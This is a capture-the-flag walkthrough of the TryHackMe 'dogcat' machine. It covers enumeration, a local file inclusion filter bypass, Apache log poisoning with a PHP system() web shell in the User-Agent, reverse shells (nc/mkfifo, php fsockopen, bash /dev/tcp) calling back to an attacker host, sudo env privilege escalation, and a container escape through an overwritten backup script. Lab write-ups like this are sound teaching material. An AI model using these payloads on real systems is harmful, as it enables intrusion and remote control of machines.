TryHackMe: dogcat

[Enumeration]

Port scan

nmap -Pn <ip>

There’re 2 ports: 22 and 80.

OS and service scan

nmap -A -p 22,80 <ip>

Vulnerable scan

nmap --script vuln -p 22,80 <ip>

Access HTTP Site

View page source

Click cat

Click dog

Scan site’s directory.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html

There’re 3 interesting files: flag.php, cat.php, and dog.php.

Access all of them.

dog.php

cat.php

flag.php , nothing revealed.

[Explaoitation]

Back to the site, seems like index page is included with “dog.php” and “cat.php”.

Try to view “flag”. Failed!!!

Only dogs and cats are allowed.

Try to access “/etc/passwd”. Failed!!!

Try to access “./dog”

Seems like I can call anything, but I need text “dog” in the request.

Let’s append “/etc/passwd” in the request.

http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwd

Seems like I need to bypass it.

Using payload all the things

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

I will use php://filter with base64.

Let’s intercept with Burp Suite

Send to Repeater

Let’s view index page first.

http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index

Success!!! There’s result with base64 strings.

Decode with Burp Suite’s Decoder.

Now I have source code of index.php.

Viewing the source code.

This means I have to include “dog” or “cat” in the request and If I don’t include parameter “ext”, It will automatically assign “.php”.

Let’s send the request again. This time I will try to read “/etc/passwd ” and include parameter “ext”

http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=

Success!!!

View page source, not much useful.

Next step, I’ll use log poisoning exploitation.

Since I screw up log file. I have to terminate the machine and start again.

I will use Burp Suite repeater to send the request

http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=

Success!!! Now I can access /var/log/apache2/access.log

Let’s add command

Edit User-Agent to be:

 <?php system($_GET['cmd']); ?>

Send the request as:

/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=id

Success!!!

Let’s get the reverse shell.

Create listener

nc -lvp 1234

Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Use Burp Suite to encode command as URL

I tried this command first:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Copy to the request and send. Failed!!!

Since this site is php, This time I will use php command.

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Copy to the request and send.

Back to listener, Now I have a shell.

[Privilege escalation]

Let’s explore the machine.

pwd
ls
cat flag.php

Now I have first flag.

cd ..
ls

There’s flag2 in “/var/www”.

cat flag2_QMW7JvaY2LvK.txt

Let’s explore user directory

cd /home
ls
ls -la

Nothing

Let’s verify if I can use sudo command.

I can use “env”.

Root command reference: https://gtfobins.github.io/gtfobins/env/#sudo

sudo env /bin/sh
id

Now I’m root.

cd /root
ls
cat flag3.txt

Now I have flag3.

Let’s explore the machine furthermore to find last flag.

cd /tmp
ls

Nothing

cd /opt
ls -la

There’s backups directory

cd backups
ls -la

This “backup.sh” s interesting.

cat backup.sh

This machine have a docker.

Let’s bypass it

Create another reverse shell

nc -lvp 1235

Replace former script in backup.sh with reverse shell

echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh

Back to listener and wait for awhile.

Now I have another shell.

ls

There’s forth flag.

cat flag4.txt